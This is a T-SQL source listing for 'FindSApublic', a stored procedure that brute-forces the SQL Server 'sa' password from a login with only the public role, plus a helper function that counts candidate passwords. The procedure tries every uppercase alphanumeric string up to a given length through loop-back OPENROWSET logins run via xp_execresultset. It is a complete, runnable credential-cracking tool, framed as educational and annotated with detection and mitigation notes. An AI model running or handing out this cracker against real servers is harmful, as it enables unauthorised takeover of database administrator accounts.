
Find SA password with public role-perm test DBA


Find SA Password (Brute Force) with Public Role


FindSApublic is a brute-force password cracker that requires only public role.

Possibilities returns how many different passwords are possible with 1 up to c characters drawn from a universe of n different characters.

Usage:

FindSApublic n

n is an integer giving the maximum length of the password to attempt cracking.


Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recommended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf

original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recommended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf


This code is provided as is and for educational purposes only.

Developed, adapted or translated to TSQL by Joseph Gama.

-- Batch-level options captured with the function created below: QUOTED_IDENTIFIER OFF makes
-- "..." a string delimiter, ANSI_NULLS OFF makes '= NULL' comparisons evaluate to true.
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

CREATE function Possibilities (@c bigint, @n bigint)
-- Number of distinct strings of length 1..@c that can be built from an alphabet of @n
-- symbols, i.e. the sum n^1 + n^2 + ... + n^c.
-- Returns 0 when @c is NULL or below 1 (the loop never runs); returns NULL when @n is NULL
-- and @c >= 1 (NULL propagates through power()). Large inputs overflow bigint and raise an
-- arithmetic overflow error rather than wrapping.
returns bigint
as
BEGIN
declare @total bigint, @len bigint
set @total=0
set @len=@c
-- walk the exponents from @c down to 1; power(@n,@len) is the count for exactly @len characters
while @len>=1
BEGIN
set @total=@total+power(@n,@len)
set @len=@len-1
END
RETURN @total
END

GO
-- end of the function batch: put ANSI_NULLS back to ON, then set the same pair of options
-- again so they are captured with the procedure created in the next batch.
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO

SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

-- Brute-forces the 'sa' login from a session holding only the public role. Each candidate
-- is wrapped in an INSERT whose source is a loop-back OPENROWSET connection (see @query
-- below) and handed to master..xp_execresultset; the INSERT only runs when the loop-back
-- login succeeds, so a row in ##temppwd means the candidate was the sa password.
-- Needs xp_execresultset to be executable by public (it was removed in later SQL Server
-- versions) and ad hoc OPENROWSET to be allowed.
-- @size: maximum candidate length; every string of 1..@size characters over @keys is tried.
-- Detection/mitigation notes for anyone running this as a test: every round is a failed
-- 'sa' login, so failed-login auditing and the errorlog ("Login failed for user 'sa'")
-- make it noisy; disabling or renaming sa, denying public EXECUTE on xp_execresultset and
-- turning off 'Ad Hoc Distributed Queries' each remove a precondition.
CREATE PROCEDURE FindSApublic (@size int)
 AS
SET NOCOUNT ON
-- @s is the candidate being built (VARCHAR(10) caps it at 10 characters); @t keeps the last
-- candidate for the 'Not found' message; @dtime is used only to report elapsed time
DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10)
SET @dtime=getdate()
-- 38-symbol universe: A-Z, 0-9, '!' and '_' (uppercase letters only)
SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_'
-- total number of candidates of length 1..@size; note the hard-coded 'test' database reference
SET @max=test.dbo.Possibilities( @size, LEN(@keys))
SET @n=len(@keys)
-- the first round (@i=0) skips the inner loop and so tries this initial 'A' as-is
SET @s='A'
SET @i=0
-- ## prefix = global temp table, visible to every session; a second concurrent run would
-- collide on this name at CREATE
create table ##temppwd (pwd  NVARCHAR(10))
WHILE @i<@max
BEGIN
SET @j=@i
-- converts the counter @i into a candidate string over @keys, one symbol per pass; the
-- sign(len(@s)) terms make every position after the first 1-based so longer strings are
-- reached. NOTE(review): that each length-1..@size string is visited exactly once is not
-- verified here.
WHILE (@j>0)
BEGIN
SET @temp=@j % (@n)-sign(len(@s))
-- wrap-around when the -1 adjustment above goes negative
if @temp<0 set @temp=@n-1
SET @j=@j /(@n+sign(len(@s)))
SET @s=substring(@keys,@temp+1,1)+@s
SET @t=@s
END
print @s
declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)
-- alternative kept by the original author: same loop-back via OPENDATASOURCE/SQLOLEDB
--set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects '''
-- @query SELECTs the text of an INSERT statement; the INSERT's source is an OPENROWSET
-- connection through the MSDASQL/ODBC driver (SERVER= left empty, presumably the local
-- default instance) as sa with the candidate password, running 'select 1'
set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')'''
-- xp_execresultset executes each row returned by @query as a T-SQL statement in master;
-- a wrong password fails the loop-back login and the INSERT never happens
exec master..xp_execresultset  @query,N'master'

if EXISTS(select * from ##temppwd)
GOTO lblFound
-- start the next candidate from an empty string (only round 0 used the initial 'A')
SET @s=''
SET @i=@i+1
END
drop table ##temppwd
-- datediff(n, ...) = elapsed minutes
select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
lblFound:
drop table ##temppwd
select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
GO
-- end of the procedure batch: restore ANSI_NULLS ON for the rest of the session
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO
